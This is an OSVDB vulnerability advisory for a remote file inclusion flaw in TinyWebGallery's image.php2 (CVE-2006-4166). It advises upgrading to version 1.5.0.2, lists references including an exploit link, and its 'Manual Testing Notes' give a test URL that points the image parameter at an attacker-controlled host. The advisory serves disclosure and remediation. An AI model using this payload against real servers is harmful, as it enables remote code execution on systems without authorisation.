TinyWebGallery image.php2 image Variable Remote File Inclusion

2006-08-10T04:28:49
ID: OSVDB:29368
Type: osvdb
Reporter: OSVDB
Modified: 2006-08-10T04:28:49

Description

Solution Description

Upgrade to version 1.5.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/[path]/examples/examples/image.php2?image=http://[attacker]

References:

Security Tracker: 1016682
Related OSVDB ID: 29367
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0027.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0186.html
ISS X-Force ID: 28317
Generic Exploit URL: http://www.milw0rm.com/exploits/2158
CVE-2006-4166